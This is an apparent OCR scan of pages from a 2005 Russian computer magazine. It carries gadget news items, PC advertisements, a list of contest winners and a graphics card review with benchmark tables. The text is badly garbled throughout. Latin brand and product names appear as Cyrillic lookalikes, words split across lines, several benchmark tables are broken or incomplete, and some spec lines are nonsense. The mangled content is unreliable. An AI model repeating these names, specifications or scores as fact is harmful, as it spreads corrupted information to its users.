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МОБИЛЬНИК-КОЛЬЦО 

На ежегодной выставке СЕАТАС, проходящей в Японии, известный 
оператор сотовой связи ЫТТ ЭоСоМо представил весьма оригинальное 
Иапсіз-Ігее устройство, выполненное в форме кольца. Конечно, кольцом 
назвать такую здоровенную штуку можно разве что условно, да и то 
только потому, что оно надевается на палец. Управление гарнитурой 
осуществляется довольно странным способом, она, например, воспри- 
нимает как сигнал, если ты соединишь между собой два пальца или же 
постучишь пальцем по уху. Связь с сотовым телефоном производится 
через канал ВІиеІооШ, микрофон идет встроенным, а вот динамик как 
таковой отсутствует. Для того чтобы услышать, что тебе кричат на дру- 
гом конце провода, придется в буквальном смысле вставить палец в 
ухо. Впрочем, такая технология известна уже давно, просто применя- 
лась раньше другими способами, кольцо просто передает вибрации 
пальцу, а ухо, в свою очередь, воспринимает их точно так же, как обыч- 
ные звуковые волны. К достоинствам такого подхода разработчики 
причисляют низкое энергопотребление и то, что разговор нельзя будет 

подслушать. Правда, чего-то я 
глубоко сомневаюсь, что такой 
способ связи придется по душе 
одновременно всем пользовате- 
лям, а особенно брезгливым лю- 
дям и девушкам с длинными ног- 
тями. Тогда уж надо было сразу 
сделать и отдельный беспровод- 
ной микрофон, действующий по 
принципу «два пальца в рот». 




Американский исследователь Тауіог Нокапзоп соорудил на досуге со- 
вершенно уникальную клавиатуру. По размеру это устройство сопоста- 
вимо с внушительным столом, а каждая клавиша немного меньше не- 
большого ведра. Печатать на данной клавиатуре можно только при по- 
мощи кувалды или другого массивного инструмента, кстати, кнопки за- 
щищены толстым слоем резины, так что просто так сломать их не 
удастся. Клавиатура стандартным способом подключается к компью- 
теру, а изображение выводится через проектор на огромный экран, ус- 
тановленный неподалеку. Конечно, создатель не преследовал своим 
изобретением какой-либо практической цели, а хотел лишь иронично 




сравнить работу на компьютере с 
доисторическими временами, ког- 
да надписи выдалбливались под- 
ручными средствами на камнях и 
скалах. Вдоволь наигрывавшись в 
домашних условиях, Тауіог выста- 
вил клавиатуру на всеобщее обоз- 
рение, и теперь попробовать напе- 
чатать пару строк может любой 
желающий, заехавший в Чикаго. 



БУДИ Л ЬН И К- ГР АН АТ А 

Если тебе приходится по утрам кого-то еще будить, то ты, наверное, предс- 
тавляешь насколько это муторный процесс. Отныне все станет намного 
проще. Всего за $9.99 в продаже появилось универсальное решение — шу- 
мовая граната. Теперь процесс «пробуждения» будет проходить намного 
проще и быстрее. Достаточно просто подкрасться к двери, крикнуть заучен- 
ную по Соипіег Зігіке фразу: Ріге іп 
Ше Поіе!, выдернуть чеку и закинуть 
гранату в дверной проем. Через 20 
секунд адская машина издаст оглу- 
шительный писк, громкость которо- 
го будет постепенно лишь нарас- 
тать. Можешь быть уверен, что че- 
рез несколько секунд после этого, 
соня пулей выскочит из своей ком- 
наты. Причем заткнуть гранату мож- 
но лишь одним способом — вста- 
вить чеку обратно, ну или выкинуть 
гранату в окно и спать дальше . . . 



ТЕПЛАЯ КЛАВИАТУРА 

Только в предыдущем номере мы писали про согревающую рукавицу 
для мыши, как нас уже спешат порадовать новым устройством. На этот 
раз выделилась фирма Е-Тгепсіз, разработав первую в мире клавиатуру 
с подогревом. Девайс может работать в трех режимах: отсутствие подог- 
рева (для лета, наверное), слабый подогрев — от 85 до 90 градусов (для 
поздней осени и ранней весны) и сильный подогрев — от 95 до 100 гра- 
дусов (для зимы). Чтобы во время работы из-за перегрева клавиатура 
не расплавилась, ее производят из высококачественного жаропрочного 
материала. Функции подогрева поедает не так много дополнительной 
энергии, а чтобы тебя в случае чего не ударило током, к самой клавиа- 
туре подводится низкое напряжение (не более 20 вольт). К компьютеру 
девайс подключается по шине 115В, однако, чтобы работало отопление, 
придется подключить ее еще и к розетке, через небольшой внешний 
блок питания. Дополнительный бо- 
нус — это способствует и нормаль- 
ной циркуляции крови в натружен- 
ных пальцах. Кстати, клавиатура 
уже вовсю продается, причем по 
довольно разумной цене — 50 бак- 
сов минус 1 цент. 






БЕЗГРАНИЧНЫЕ 

ВОЗМОЖНОСТИ 

Откройте для своей семьи новые способы обучения, общения 
и развлечений - приобретите персональный компьютер ФРОНТ™ 
на базе процессора ІпіеІ® Репйипгі® 4 с технологией НТ. 
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ТЕХНОЛОГИИ ПОБЕДЫ 
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ФР©МТ 

ѵѵѵѵѵѵ.ігопірс.ги 



ІпіеІ, логотип Іпіеі, ІпіеІ Іпзісіе, логотип Іпіеі Іпзісіе, Іпіеі Сепігіпо, логотип Іпіеі Сепігіпо, Сеіегоп, ІпіеІ Хеоп, ІпіеІ ЗреесІЗІер, Ііапіит, Репііит и Репііит III Хеоп 
являются товарными знаками или зарегистрированными товарными знаками корпорации Іпіеі и ее подразделений в США и других странах. 




НІТЕСНМЕѴѴЗ Ж 



НАВРЫЕѴѴЗ ▼ 



г МАСІС: 

5 ТНЕ САТНЕКШС: 

І ДЕВЯТАЯ ВЕРСИЯ 
1 НА ДЕВЯТОМ ЯЗЫКЕ 

24 и 25 сентября компания ѴѴігагсІз оі ІПе Соазі приветствовала всех 
поклонников НАСТОЯЩЕЙ МАГИИ в Новом Манеже, где по случаю за- 
пуска 9-ой редакции Мадіс: ТНе ОаІИегіпд на русском языке проводи- 
лась серия специальных турниров. 

Это были насыщенные и незабываемые выходные! В Москву для учас- 
тия в Турнире прибыли сильнейшие игроки со всего мира, среди них 16 
самых знаменитых профессионалов из Европы, Азии, Северной и Юж- 
ной Америки, в том числе 3 чемпиона мира из Германии и Нидерлан- 
дов, которые сыграли против 16 самых рейтинговых и известных игро- 
ков из России и Украины. 

Победителем чемпионата по случаю релиза русского издания Мадіс: 
ТПе ОаІИегіпд стал российский игрок Матвей Линов! В финальном со- 
ревновании с Антони Руэлем из Франции Матвей добился блистатель- 
ной победы. Награды победителям и финалистам вручили вице-прези- 
дент компании ѴѴігагсІз оі іііе Соазі Джо Хок и Ричард Г арфилд, ученый- 
математик, создатель игры Мадіс: ТНе ОаІІіегіпд. 




ПОБЕДИТЕЛИ 
КОНКУРСА ГАРНЬЕР 

Список победивших: 

Филиппова Ольга, Агафонова Ирина, Никитин Александр, Вишняков 
Юрий, Корсаков Максим, Мирских Екатерина, Наумов Александр, 
Стрельникова Татьяна, Саделов Олег, Шумков Евгений, Маленков 
Андрей, Мохнач Карина, Бубенков Игорь, Королева Наташа, Петров 
Сергей, Снегов Виталий, Маврин Денис, Новиков Валерий, Насибов 
Мурад, Горбушина Валентина, Вагин Дмитрий, Воршев Денис, Голу- 
бева Аня, Гололобов Егор, Гуров Сергей, Верб- 
люденко Павел, Фоменко Игорь, Вахрамов Алек- 
сей, Денисов Игорь, Захаров Олег, Золотарев 
Андрей, Ибрагимова Лена, Катыкин Максим, Бы- 
кова Ольга, Васин Михаил, Власова Анастасия, 
Камышко Олег, Котеленец Татьяна, Каравай Ев- 
гений, Машков Сергей, Митрофанова Света, 
Масленко Александр, Бараков Николай, Осташ- 
кин Алексей, Николаев Михаил, Потапова Татья- 
на, Решетилов Георгий, Пеньков Сергей, Сафро- 
нова Елена, Федорова Нина. 



МАЛЫШИ ПРИШЛИ 

Мода на минимизацию всевозможных устройств, похоже, не собирает- 
ся прекращаться, а наоборот, набирает силу. Но чтобы плееры, сотовые 
телефоны и прочие девайсы становились миниатюрнее, нужно умень- 
шать все их компоненты, включая то, на чем хранятся данные. Флэш- 
картами с приставкой тіпі уже давно никого не удивить, а вот тісго по- 
ка еще в новинку. Сегодня до этого размера уменьшились карточки 30 
и Мегтюгу Зііск. Последняя имеет размер 15x12,5x1,2 мм, что составля- 
ет менее четверти размера Мегтюгу Зііск РРЮ Оію. Максимальная ем- 
кость носителя 32 Гб, а максимальная пропускная способность 160 
Мб/с. Карта может работать с напряжением 3,3 и 1 ,8 В. Маленькая 30 
обладает такими параметрами: она в пять раз меньше своей полнораз- 
мерной сестры, скорость передачи данных составляет 10 Мб/с. Чтобы 
такие малютки читались обычным кард-ридером, нужно использовать 
специальный переходник. 




ШПИОНСКАЯ РУЧКА 

В американском магазине Оас/деіііпіѵегзе.сот в продажу поступила 
уникальная шпионская ручка, оборудованная встроенной цифровой ка- 
мерой. По размеру устройство практически не отличается от обыкно- 
венной шариковой ручки, а объектив камеры почти не заметен, так что 
ее вполне можно использовать для различных западлостроительных 
операций средней секретности. Вот только, увы, устройство выглядит 
немного устаревшей на фоне современных технологий. Разрешение 
снимков равняется жалким 160x120, встроенная память составляет 
лишь 2 Мб, куда влезает всего 36 фотографий, а сам девайс подключа- 
ется к компу через СОМ порт. Скорее всего, такие скромные характе- 
ристики — последствия гонки за компактными размерами, но даже 
несмотря на это, она все равно представляет определенный интерес. 
За то, чтобы таким образом почувствовать себя в шкуре Джеймса Бон- 
да, придется облегчить свой кошелек на 69.95 безусловных единиц. 






ФАЛЬШИВЫЙ 
ЗЕВѴІСЕ РАСК 



РЕАЛЬНО 

БЕСПЕРЕБОЙНЫЙ! 



«На сайте Гіогііх.пеі появился Зегѵісе Раск 3!!!». Такую новость недавно трубили компь- 
ютерные форумы, там же указывалось, какие баги он исправляет. Новость, конечно, 
интересная, только вот МісгозоГС от нее оказалась далеко не в восторге. Дело в том, 
что этот ЗРЗ — неофициальный, и никакого отношения к компании Билла не имеет. 
Аналитик МісгозоТС Майк Брэнниген выступил с заявлением, в котором категорически 
не советует устанавливать это обновление, потому что оно, хоть и исправляет часть 
ошибок, но вносит новые, разрушая взаимосвязь компонентов ОС. МісгозоТС даже про- 
вела собственное расследование, в результате которого выяснила, что впервые этот 
пак появился на Ооодіе Огоир, а выложен был с целью подорвать авторитет компании 
ее злейшим конкурентом. В ответ на слова Майка, свое заявление дал создатель Ш- 
ііх.пеі Этан Эллен, который признает неофициальность ЗРЗ, но считает его установку 
необходимой из-за количества багов в ОС. Он также заверил, что Ооодіе никакого от- 
ношения к сервис-паку не имеет, и получил он его от знакомого, работающего в 
МісгозоК. Официальный же релиз ѴѴіпбоѵѵз ЗР 3 намечен на конец 2006 года. 




ЕВАУ ДАЕТ НОВУЮ 
ЗАЩИТУ КЛИЕНТАМ 

Очевидно, работников ЕЬау достали жалобы клиентов о постоянных надувательствах 
и случаях воровства номеров кредиток. Потому что недавно крупнейший онлайновый 
аукцион прикупил за 370 миллионов долларов новую систему аутентификации у ком- 
пании Ѵегізідп. Теперь на ЕЬау будет использоваться двойная проверка твоей личнос- 
ти наряду с действующей системой РаураІ. В следующем году более миллиона клиен- 
тов ЕЬау получат шестизначные коды, которые нужно будет вводить вместе с паролем. 
Код меняется ежеминутно и уникален для совершения каждой платежной операции. 
Сдерут ли с клиентов денежки за повышенную безопасность, будет объявлено позже, 
хотя, думаю, доходов аукциона должно хватать, чтобы позволить себе 10 таких систем. 
Продукция Ѵегізід, кстати, уже давно проверена временем и достаточно популярна сре- 
ди компаний, заботящихся о безопасности своих сервисов. 




Вазе 400 ѴА 
Вазе 600 ѴА 
Вазе 800 ѴА 



Мазіег 525 ѴА 
Мазіег 625 ѴА 



Рго 1000 ѴА 
Рго 1500 ѴА 




источники 

бесперебойного 

питания 
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НАВОЫЕѴѴЗ ▼ 



НІТЕСНМЕѴѴЗ ▼ 



* САЫОЫ С ОБНОВКОЙ 




20 сентября 2005 года в зале торжеств «Форум Холл» прошла грандиоз- 
ная презентация новых цветных принтеров компании Сапоп. Компания 
Сапоп представила три новые модели лазерных МФУ серии І_азегВазе: 
І_азегВазе МР5730, МР5750, МР5770, новый цветной лазерный принтер 
І_азег ЗПоІ І_ВР5200, а также анонсированные летом два новых лазерных 
факса — Сапоп Рах-І_120 и Рах-ЫОО. Также компания Сапоп не обошла и 
принтеры для профессиональный фотопечати. Сапоп представила обнов- 
ленный модельный ряд многофункциональных устройств с функцией 
профессиональной фотопечати серии РІХМА — РІХМА МР150, МР170, 
МР450, МР500 и РІХМА МР800 — первоклассную модель с функцией про- 
фессиональной фотопечати. Демонстрация всех возможностей новых 
принтеров в действии состоялась по окончании деловой части. «Зажигай 
всеми красками» — стильные принтеры, стильные девушки на мотоцик- 
лах, свет, музыка и много-много цвета распечатанных фотографий произ- 
вели на участников презентации поистине зажигающее впечатление. 



ОЧКИ АНТИСПАМ 

Ты не устал от мегатонн спама, который валится в твой почтовый ящик, 
а от сотен рекламных баннеров на твоих любимых страницах? Однако 
со всем этим еще можно как-то бороться, существуют различные спам- 
фильтры и блокираторы, которые при должной настройке более ли ме- 
нее решают проблему. А вот от уличных рекламных плакатов уже так 
просто не отделаешься. Повернуть голову в другую сторону обычно не 
помогает, скорее всего и там тебя будет поджидать очередное творение 
криворуких рекламщиков, а если ходить и срывать плакаты, то наша 
доблестная милиция наверняка тебя не совсем правильно поймет. Вот 
если были бы такие волшебные очки, через которые было бы видно, 
только то, что ты хочешь... А ведь на самом деле такая разработка уже 
существует, и называется это чудо техники — ЗееРгее діаззез. Внешне 
устройство напоминает модные солнечные очки, разве что слегка боль- 
шего размера. Девайс работает следующим образом: над стеклами на- 
ходятся незаметные миниатюрные видеокамеры, которые постоянно пе- 
редают изображение к встроенному микропроцессору. Далее картинка 
в реальном времени обрабатывается, на ней обнаруживаются нежела- 
тельные рекламные элементы, которые закрашиваются серым цветом, 
а затем уже обработанное изображение проецируется на сетчатку. При- 
чем стекла полностью прозрачны, а проецируется лишь маска, перекры- 
вающая рекламу. В результате ты видишь абсолютно все то же самое, 
только без рекламы. Создатели продвигают свое изобретение преиму- 
щественно для автомобилистов, чтобы реклама лишний раз не отвлека- 
ла их во время движения, а также для туристов, чтобы тебе могли нас- 
ладиться прелестями посещаемого города в его первозданной красе. 
Хай-тек очки уже в 
ближайшее время 
предполагается про- 
изводить серийно, а 
первоначальная цена 
на них составит при- 
мерно 1,5 килобакса. 

Кстати, уже разраба- 
тываются и более 
смелые решения, 
например, можно бу- 
дет на месте рекламы 
отображать не серое 
пятно, а какую-нибудь 
ценную информацию, 
например, содержа- 
ние твоего почтового 
ящика, ну, или фотог- 
рафии обнаженных де- 
вушек. . . 



СОТОВЫЙ МЕДВЕДЬ 




СКРЕСТИМ 
ФОТИК И ПЛЕЕР 

Обычными флэш-плеерами сегодня никого не 
удивишь, вот компании-производители и стара- 
ются перещеголять друг друга дизайном своих 
устройств или чем-то еще, напрямую с функци- 
оналом не связанным. Но корпорация Затзипд 
решила пойти другим путем и представила нам 
гибрид обычного флэш-плеера с цифровым фотоаппаратом. Это серия 
Міпікеі, представленная моделями ѴР-М315, ѴР-М311 и ѴР-М310, кото- 
рые имеют разный объем встроенной памяти (до 512 Мб), а объединяет 
их 5-мегапиксельное разрешение сенсора, 3-х кратный оптический и 15- 
ти кратный цифровой зум, система цифровой стабилизации для устра- 
нения последствий трясущихся рук, а также возможности записи виде с 
качеством до 30 Трз. Не очень большой объем памяти можно расширить 
за счет карточки тіпіЗЭ, а печатать получившиеся фотографии возмож- 
но как с компьютера (через порт 115В 2.0), так и напрямую с принтера 
(технология РісІВгісІде). Начало продаж ожидается в ноябре. 




Уже дошло до того, что теперь без мобильника не могут обходиться 
даже дети, поэтому самые расторопные производители спешат поско- 
рее занять и эту нишу. Новый телефон — Вибсіу Веаг РНопе, выпол- 
ненный в форме забавного медведя, предназначен как раз для самых 
маленьких: детей в возрасте от 3 до 10 лет. Конечно, медвежонок не 
является полноценным телефоном, у него даже и дисплея нет, но де- 
тям это собственно и ни к чему. С телефона можно отвечать на все 
звонки (нажать медведю на нос справа), а вот 
звонить можно лишь на четыре заранее зап- 
рограммированных номера (нажать на соот- ^ 

ветствующую лапу), также на эти номера | — | 

можно послать смс с заранее записанным 
текстом, а еще ребенок в случае чего может 
вызвать экстренную службу (нажать медведю 
под ухом). Родители могут полностью управ- 
лять мобильником дистанционно (для этого 
надо знать РІЫ-код), а если телефон ребенка 
разрядится, то родители будут оповещены об 
этом по смс. Вот только цена на детский мо- 
бильник — совсем не детская, игрушка обой- 
дется примерно в 130 евро. 




НІТЕСНМЕѴѴЗ Ж 



ОТІ-ГІ РЮКЗАК 



















Притупились 

мысли? 



Список устройств, без которых мы не можем прожить и дня, из года в год постоянно 
увеличивается. В последнее время в этот список жизненных необходимостей доба- 
вился и беспроводный Интернет через ѴѴі-Рі. А если ты собрался, например, в поход, 
то откуда там, в отсутствие всяких серверов, взять ѴѴі-Рі? Правильно, только взять 
сам сервер с собой. Подобный проект, под названием ѴѴі-Рі. Вебоиіп, разрабатывает- 
ся энтузиастами еще с 2003 года и вот только сейчас, наконец, добрался до финаль- 
ной стадии. Уникальный девайс собран из ноутбука РоѵѵегВоок 04, точки доступа 
802.1 1 Ь, усилителя сигнала и батареи на 6000 мА/ч, причем все это упаковано в ком- 
пактный стильный рюкзак. Программное обеспечение ѴѴі-Рі. Вебоиіп позволяет орга- 
низовать вэб-сервер, а также ведение блогов и чатов. При попытке доступа к полно- 
ценным вэб-сайтам, сервер будет автоматически перенаправлять тебя к локальным 
сходным страницам. Конечно, подобный симулятор Интернета никак не связан с са- 
мой глобальной сетью, но для безрыбья и этого будет более чем достаточно. Для уп- 
равления сервером на внешней стороне закреплен КПК ІРАО 2200, который, как ни 
странно, связан с сервером также через ѴѴі-Рі. На КПК также отображается твое мес- 
тонахождение, определяемое при помощи ОРЗ, и обозначается активность ѴѴі-Рі. 



ПРАКТИЧНАЯ 

КЛАВИАТУРА 




Если ты уже отчаялся навести на своем столе порядок, то, возможно, тебе сможет 
помочь следующий крайне практичный гаджет. На первый взгляд КеуЬоагб Оезк 
Тібу ничем не отличается от стандартной полноразмерной клавиатуры, однако, ес- 
ли присмотреться, то на передней кромке можно обнаружить небольшую ручку, 
потянув за которую, ты сможешь поднять верхнюю крышку клавиатуры и с удив- 
лением обнаружить под ней отсек для всяких мелочей. Действительно это — весь- 




ма толковое изобретение, ведь 
обычно клавиатура занимают ос- 
новную часть рабочего места, а 
его, как известно, надо использо- 
вать рационально. В нижний от- 
сек можно запрятать всякие руч- 
ки, карандаши, ластики, ножницы 
и прочий канцелярский хлам, а 
также несколько болванок (для 
них специальное отделение), кучу 
флэшек и еще много чего. После 
этого есть все шансы, что на сто- 
ле образуется нечто напоминаю- 
щее порядок. Новинка уже нахо- 
дится в свободной продаже и го- 
това отдаться в хорошие руки за 
24.95 евро. 



заточись на 
\ѵ\ѵ\ѵ*рІіепотепІаІ*ги 



Феноментальное решение 



• для концентрации внимания 

• для улучшения памяти 

• для быстрой активации 
умственной деятельности 



Узнай больше на 
\ѵ\ѵѵѵ*рНепотепІаІ.ги 




ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ [ГЕКК1Ш] НЬЮСЫ 



А81ІЗ ЕХТВЕМЕ N7800 ОТХ ТОР I АЗІІЗ ЕХТВЕМЕ 
N7800 ОТ I МЗІ NX6800 I МЗІ NX6800 ШТВА 
МЗІ NX7800 ѲТХ I АОРЕN АЕОШЗ 7800 ѲТХ 
ЗАРНІПЕ АТІ ПАОЕСМ Х800 XI. I ЗАРНІПЕ АТІ 
ПАОЕОИ Х850 ХТ I ЗАРНІПЕ АТІ ВАРЕОИ XI 800 
XI. I ѲІѲАВУТЕ ѲѴ-301-68ѲТ 




СЕДЬМОЕ ПОКОЛЕНИЕ ГРАФИЧЕСКИХ КАРТ 

Г рафические карты — это наиболее прогрессивно развивающийся и востребованный продукт на сегодняшнем рынке компью- 
терной индустрии. С тех пор, когда выпускать и развивать графические чипы, а также успешно конкурировать на данном поп- 
рище могла каждая ІТ-Компания, уже утекло много воды. Сейчас среди бытовых видеопроизводителей для РС остались толь- 
ко два гиганта — ІЧѵісІіа и А1 Каждый из них, пытаясь продемонстрировать свое превосходство, поочередно делает шаг, выпус- 
кая видеоадапетры со все новыми и новыми процессорами, и ждет ответа конкурента. А мы рассмотрим и оценим видеокар- 
точки на основе чипов от данных компаний, которые еще долго будут задавать тон как для геймера, так и для оверклокера. 







I # I 
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дайте две 

Тестируем Ні-ЕпсІ видеоакселераторы 




Попов Евгений, ІезПаЬ (ІезНаЬ@даітіеІапсІ.ги) 

Возрадуйтесь, о жаждущие гамать без тормозов в ближайшие годы! Данный тест мы реши- 
ли посвятить поколению видеокарт, которое давно уже умопомрачительным образом бьет 
все рекорды по производительности, в чем мы довольно скоро уже убедимся. Но прежде 
чем говорить о претендентах на пост «самого крутого видеоадаптера» и результатах наше- 
го эксперимента, расскажем немного о техническом аспекте рассматриваемого вопроса. 



[тестовый стенд] 




Тестирование проводилось более чем стандарт- 
ным методом, который позволяет максималь- 
но объективно оценить производительность 
того или иного графического адаптера. Перво- 
начально мы оцениваем внешние параметры 
карт, то есть дизайн, комплектацию, а также 
цену на продукт. Затем переходим к техноло- 
гическому тестированию. Это означает, что 
мы запускаем карточки на различных игровых 
платформах, таких как ОоошЗ, РагСгу, НаКІ_йе 
2 и замеряем РРЗ при заданных параметрах 
разрешения( 1024x768 и 1600x1200). Для нас 



также немаловажным фактором является пол- 
ная оценка системы выполненная с помощью 
таких бенчмарков, как 30 Магк 2005 и ЗЭ Магк 
2003 для разрешения 1 024x768. Единственной 
трудностью при тестировании был недостаток 
питания, но эта проблема решалась подключе- 
нием параллельного блока для энергообеспе- 
чения непосредственно самой видеокарты. 
Само собой для таких крепких парней, как на- 
ши подопытные, мы не забыли включить как 
анизотропную фильтрацию (4х уровень), 
так и антиалайзинг (16х уровень). 



Процессор: АМР А1Ыоп64 3800+ (Зоскеі 939) 

Материнская плата: МЗІ К8Ы-ЗІ-І РіаппопсІ 

Память: Согзаіг СМХР51 2-3200X1 (2x51 2МЬ - сіиаі) 

Кулер: "ЛіегтаІІаке СЬР0114 Від Турііооп 

Жестак: Зеадаіе Ваггасисіа ЮЕ 80МЬ 

Операционная система: ѴѴіпсІоѵѵз ХР РгоіеззіопаІ ЗР2 

Блок питания: Сооіег Мазіег В5-450-АСІ-Ѵ, 450ѴѴ + Зиппу Тесііпоіодіез АТХ-350, 350 ѴѴ 



іѳзі_ІаЬ выражает благодарность за предоставленное на тестирование оборудование 
российским представительствам компаний Зарріпіге, Азиз, МЗІ, Аореп, ѲідаЬуіе 



[ХАКЕР 11 [83] 05 > РЕПРіим 021 ] 





ХАКЕР 11 [83] 05 > ГЕВВІШ 022 ] 



АЗІІЗ Ехігете 
N7800 СТ 

Г рафический процессор: ІЧѴІРІА ѲеРогсе 7800ѲТ 

Частота проІіЛ^іа: 430 МГцТ . 1 • 7.~ '1 1 Л - 

Видеопамять: 256 Мб РРВЗ, 1200 МГц, 256 бит 

Частота РІАМРАС: 430 МГц 

Интерфейс: АОР или РСІ-Е 

Разъемы РиаІ УСА, 2хРѴІ, ѴІѴО 

Возможность РиаІ-установки: Да 

Поддержка РігесІХ 9.0с, ОрепОІ- 2.0, ЗІіасІег МосІеІ 3 



Это, если можно так выразиться, младший брат акселератора А81ІЗ Ехігете N7800 
ОТХ ТОР. Внешние данные практически не отличаются: та же рыжая физиономия 
на карте и упаковке, да и вообще весь дизайн похож. Вместо кейса под диски из 
кожзаменителя прилагается пластиковый, а картонной упаковочки с играми нет и 
подавно. Однако все это не важно, если продукт выдает то, что от него хочет поль- 
зователь. А именно это и происходит. В некоторых тестах карта не только догоняет 
своего топового конкурента, но еще и значительно обходит. Вот тут и начинаешь за- 
думываться: если нет разницы, зачем платить больше. Тем более, если минусы все 
те же. Карта тяжеленная и широкая. Все также ускоритель греется, все также уме- 
ренно шумит на высоких частотах. Отсюда единственный вывод — советуем повни- 
мательнее приглядеться к такой модели. Может быть это то, что тебе нужно. 





МЗІ ЫХ7800СТХ-8Ы 



Г рафический процессор: ІЧѴІРІА ОеРогсе 7800РТХ (070) 
Частота п^д^рдрі:;' 1 х430 МГіціТ.ѵ 1 7 

Видеопамять: 256 Мб РРВЗ, 1200 МГц, 256 бит 

Частота ВАМ РАС: 400 МГц 

Интерфейс: РСІ-Е 

Разъемы ТѴ-оиі, 2хРѴІ, ѴІѴО, НРТѴ 

Возможность РиаІ-установки: Да 

Поддержка РігесІХ 9.0с, ОрепОІ- 2.0 



Компания М8І, известная на компьютерном рынке своими материнскими платами, 
представлена в тесте тремя графическими контроллерами. Данный агрегат — один 
из самых мощных в нашем обзоре. Он поставляется в изящной, красивой, серебрис- 
той коробочке с ручкой. Внутри мы можем помимо карты, на лицевой стороне кото- 
рой изображен ангел в женском обличье, найти кабель ѴІѴО, кабель дополнительно- 
го питания, два переходника ОѴІ/О-ЗІІВ, диск с драйверами и утилитами, инструкцию 
по быстрой установке и руководство пользователя. Помимо этого, можно найти иг- 
рушку ТИе СІпгопісІез оі Вісісііск на шести СО. Дизайн карты прост и без излишеств. 
С обратной стороны адаптера расположены 4 чипа памяти, закрытые радиатором. 
Стоит заметить (это видно по результатам тестирования), что наилучшее использование 
данного продукта будет наблюдаться при соединении двух одиночных контроллеров 
в режим ЗІ_І. В режиме одиночного использования карта от М8І — лучшая в своей кате- 
гории. Явных минусов, кроме слабозаметного шума, отметить вряд ли что-то можно. 




5І_І ПРОТИВ СВ055РІВЕ 

Стоит сказать, что первоначально компания ІЧѵісІіа 
представила на суд публики технологию под названи- 
ем ЗІ_І(ЗсаІаЫе Ыпк Іпіегіасе), при использовании кото- 
рого в одном компьютере могут быть объединены 
мощности двух аналогичных графических контролле- 
ров. А в ответ, как и следовало ожидать, АТІ 
Тесііпоіодіез выпускает подобную систему. 

Для СгоззЛге имеется ведомая карта и ведущая. Если 
ты ставишь в качестве ведущей карточки специальные 
платы на чипе Х850 или х800, то любые другие карты 
на подобных чипах будут вполне совместимы. В слу- 
чае ЗІ_І надо обязательно поставить именно одинако- 
вые карты. Стоит сказать, что большинство акселера- 
торов в нашем тесте поддерживают либо ЗІ_І, либо 
СгоззРіге, так что в будущем можно повысить произво- 
дительность, докупив твоему акселератору пару. 



[тестим с помощью] йІВЕСТХ 9.0С 

РВАРЗ 2.2.5 ВЕТАИ. 

РОВСЕѴѴАВЕ Ѵ/61.76 
АТІ САТАЬУЗТ 5.6 
РІІТІІВЕМАВК ЗОМАВК '05 1.0 
РІГШВЕМАВК ЗРМАВК '03 РВО 3.4.0 



30 ІТІГІнК ЕООЭ 



МЗІ ЫХ6800 


5362 | 




















ЗАРНЕВЕ АТІ ВАйЕОЫ Х800 ХІ_ 


7421 




















МЗІ ЫХ6800 ІІІ.ТВА 256МВ 


7832 




















ЗАРНІВЕ АТІ ВАЭЕОИ Х850 ХТ 


8034 




















ОІОАВІТЕ 0Ѵ-301-680Т 


8145 




















АЗІІЗ ЕХТВЕМЕ N7800 ОТ 


9965 
















АОРЕN АЕОШЗ 7800 ѲТХ 


10120 












АЗІІЗ ЕХТВІМЕ N7800 ОТХ ТОР 


10968 












ЗАРНІВЕ АТІ ВАОЕОИ XI 800 ХІ_ 


11795 










МСІ NX7800 ОТХ 
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30 ГПйнК 2005 



МЗІ NX6800 


3823 




















ЗАРНЕВЕ АТІ ВАЭЕОИ Х800 Х1_ 


4311 




















МЗІ ИХ6800 ІІІ.ТВА 256МВ 


4869 




















ЗАРНІВЕ АТІ ВАЭЕОИ Х850 ХТ 


4899 




















ОІОАВІТЕ 0Ѵ-301-680Т 


5120 


















АЗІІЗ ЕХТВЕМЕ N7800 ОТ 


6654 










АОРЕN АЕОШЗ 7800 ОТХ 


6764 










АЗІІЗ ЕХТВІМЕ N7800 ОТХ ТОР 


6822 
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ЗАРНІВЕ АТІ ВАОЕОИ XI 800 ХІ_ 


6937 










МСІ ИХ7800 ОТХ 


6756 
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МЗІ ИХ6800 
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ЗАРНЕВЕ АТІ ВАЭЕОИ Х800 ХІ_ 
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МЗІ ИХ6800 ІІІ.ТВА 256МВ 
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ЗАРНІВЕ АТІ ВАОЕОИ Х850 ХТ 


ш\ 






















ОІОАВІТЕ 0Ѵ-301-680Т 
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АЗІІЗ ЕХТВЕМЕ N7800 ОТ 
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АОРЕN АЕОШЗ 7800 ОТХ 
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АЗІІЗ ЕХТВІМЕ N7800 ОТХ ТОР 
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ЗАРНІВЕ АТІ ВАОЕОИ XI 800 Х1_ 
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МСІ ИХ7800 ОТХ 


158.1 






•1 1 М 1 И 1 1=1 1 1= 


■1 


|>| 




§ 






1» 


г 




і 



Также ЗарЫге АТІ ВАОЕОЫ XI 800 ХЕ на вторых 







Создай свою реальность 

с компьютером ОЕРО Едо на базе процессора ІпЪеІ® РепЪіит® 4 с технологией НТ 






Включи ОЕРО Едо — и перед тобой откроется новая реальность твоих 
любимых компьютерных игр. Наслаждайся быстротой реакции и скоростью, 
исследуй распахнувшийся перед тобой мир высококачественной 
компьютерной графики и настоящего экшена. Теперь эта цифровая 
реальность может стать твоей благодаря компьютеру ІЭЕРО Едо на базе 
процессора ІпЪеІ® РепЪіит® 4 с технологией НТ. 



ОЕРО Едо 360 ТѴ: 

• процессоры ІпЪеІ® Репйигп® 4 с технологией НТ серии бхх (2Мб сазН второго 

• чипсет ІпЬеІ® 925ХЕ с улучшенной архитектурой 

• сверхбыстрая память 00П2 

• новые возможности графики РСІ-Ехргезз 

• реалистичный объемный 8-канальный звук 



/ Компания ОЕРО СотриЪегз 



Тел./факс: (095) 969-2215, ѵѵѵѵѵѵ.сіеро.ги 



ІпСеІ, ІпЬеІ Іпзісіе, Ыпе ІпЪеІ Іпзісіе І_одо и ІпіеІ РепСіит являются зарегистрированными товарными знаками ІпСеІ СогрогаЫоп и её отделений в США и других странах 
ІѴІісгозоІТ и ѴѴІпсІоѵѵз являются зарегистрированными товарными знаками компании МісгозоШ и её отделений в США и других странах. 





РЕВВІІМ 



ЗаррЫге АТІ 
Насіеоп Х800ХІ. 

Графический процессор: ВАРЕОМ Х800Рго (В430) 

Частота процессора: 400 МГц 

Видеопамять: О-РРВ 3, 256 Мбайт 

Частота ВАМ РАС: 400 МГц 

Интерфейс: РСІ Ехргезз 16х 

Разъемы Р-5иЬ и РѴІ 

Возможность РиаІ-установки: Да 

